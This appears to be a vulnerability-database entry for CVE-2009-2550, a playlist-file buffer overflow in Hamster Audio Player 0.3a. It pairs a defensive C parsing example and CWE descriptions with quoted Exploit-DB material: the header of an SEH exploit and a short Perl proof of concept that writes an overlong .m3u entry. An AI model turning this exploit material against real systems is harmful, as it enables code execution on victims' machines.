CVE-2009-2550
Published 2009-07-20
Priority: P342 · critical · 9.3 (CVSS 2.0)
AV:N/AC:M/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 8.66% (94.4th percentile)
Stack-based buffer overflow in Hamster Audio Player 0.3a allows remote attackers to execute arbitrary code via a long string in a (1) .m3u or (2) .hpl playlist file.
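The defensive counterpart to the flaw described above, as an added example: it is not Hamster Audio Player's code (the page does not show the vulnerable source). The 260-byte `MAX_ENTRY` limit, the function names, the line-oriented playlist layout and the sample input are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

#define MAX_ENTRY 260  /* assumed per-entry limit (Windows MAX_PATH) */

/* Copy each playlist line into a fixed-size slot only after checking that it
 * fits. Overlong lines are counted in *rejected and skipped, never truncated. */
size_t parse_playlist(const char *data, size_t len,
                      char entries[][MAX_ENTRY], size_t max, size_t *rejected)
{
    size_t n = 0, pos = 0;
    *rejected = 0;
    while (pos < len) {
        const char *line = data + pos;
        const char *nl = memchr(line, '\n', len - pos);
        size_t span = nl ? (size_t)(nl - line) : len - pos;
        pos += span + (nl ? 1 : 0);
        if (span > 0 && line[span - 1] == '\r') span--;  /* CRLF playlists */
        if (span == 0 || line[0] == '#')
            continue;                        /* blank line or #EXT directive */
        if (span >= MAX_ENTRY) {             /* no room for data plus NUL */
            (*rejected)++;
            continue;
        }
        if (n < max) {
            memcpy(entries[n], line, span);
            entries[n++][span] = '\0';
        }
    }
    return n;                                /* entries stored, at most max */
}

/* Constructed input: two ordinary entries around one 4113-byte line,
 * the length used by the PoC quoted on this page. */
size_t demo(char entries[][MAX_ENTRY], size_t max, size_t *rejected)
{
    static char buf[4200];
    size_t off = (size_t)snprintf(buf, sizeof buf, "#EXTM3U\r\nC:\\Music\\one.mp3\r\n");
    memset(buf + off, 'A', 4113); off += 4113;
    off += (size_t)snprintf(buf + off, sizeof buf - off, "\nC:\\Music\\two.mp3");
    return parse_playlist(buf, off, entries, max, rejected);
}

int main(void)
{
    char entries[8][MAX_ENTRY];
    size_t rejected, n = demo(entries, 8, &rejected);
    return printf("stored=%zu rejected=%zu\n", n, rejected) < 0;
}
```

The length check comes before any copy, so the destination size, not the input, decides how many bytes are written.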
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ondanera | hamster_audio_player | — | — |
No detection rules found.
Exploit-DB
Hamster Audio Player 0.3a - Universal Buffer Overflow (SEH)
exploitdb·2009-07-16
---
#!/usr/bin/perl
#[+] Bug : Hamster Audio Player 0.3a Universal BOF Exploit (SEH)
#[+] Author : ThE g0bL!N
#[+] Greetz to all my friends
#[+] Tested on: Windows XP Pro SP2 (Fr)
##[+] Big thnx: His0k4
##########################################################
# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
Exploit-DB
Hamster Audio Player 0.3a - Local Buffer Overflow (PoC)
exploitdb·2009-07-15
---
# Hamster Audio Player 0.3a Local BOF PoC
my $crash="\x41" x 4113 ;
open(myfile,'>>PoC.m3u'); #/HPL
print myfile $crash;
# By ThE g0bL!N
#Download:http://www.brothersoft.com/hamster-audio-player-download-235347.html
#Note: His0k4 Win Rak :(
# milw0rm.com [2009-07-15]
No writeups or analysis indexed.
CWE
Access of Memory Location After End of Buffer
mitre_cwe
CWE-788: Access of Memory Location After End of Buffer
The product reads or writes to a buffer using an index or pointer that references a memory location after the end of the buffer.
This typically occurs when a pointer or its index is incremented to a position after the buffer; or when pointer arithmetic results in a position after the buffer.
Modes of Introduction:
Phase: Implementation
Common Consequences:
Scope: Confidentiality. Impact: Read Memory. For an out-of-bounds read, the attacker may have access to sensitive information. If the sensitive information contains system details, such as the current buffer's position in memory, this knowledge can be used to craft further attacks, possibly with more severe consequences.
Scope: Integrity, Availability. Impact: Modify Memory, DoS:
CWE
Out-of-bounds Write
mitre_cwe
CWE-787: Out-of-bounds Write
The product writes data past the end, or before the beginning, of the intended buffer.
Modes of Introduction:
Phase: Implementation
Common Consequences:
Scope: Integrity. Impact: Modify Memory, Execute Unauthorized Code or Commands. Write operations could cause memory corruption. In some cases, an adversary can modify control data such as return addresses in order to execute unexpected code.
Scope: Availability. Impact: DoS: Crash, Exit, or Restart. Attempting to access out-of-range, invalid, or unauthorized memory could cause the product to crash.
Scope: Other. Impact: Unexpected State. Subsequent write operations can produce undefined or unexpected results.
Detection Methods:
Automated Static Analysis: This weakness can often be detected using automated s
CWE
Improper Restriction of Operations within the Bounds of a Memory Buffer
mitre_cwe
CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer
The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.
Background: Certain languages allow direct addressing of memory locations and do not automatically ensure that these locations are valid for the memory buffer that is being referenced.
Modes of Introduction:
Phase: Implementation
Common Consequences:
Scope: Integrity, Confidentiality, Availability. Impact: Execute Unauthorized Code or Commands, Modify Memory. If the memory accessible by the attacker can be effec
http://osvdb.org/55871
http://secunia.com/advisories/35825
http://www.exploit-db.com/exploits/9157
http://www.exploit-db.com/exploits/9172
https://exchange.xforce.ibmcloud.com/vulnerabilities/51732
Published 2009-07-20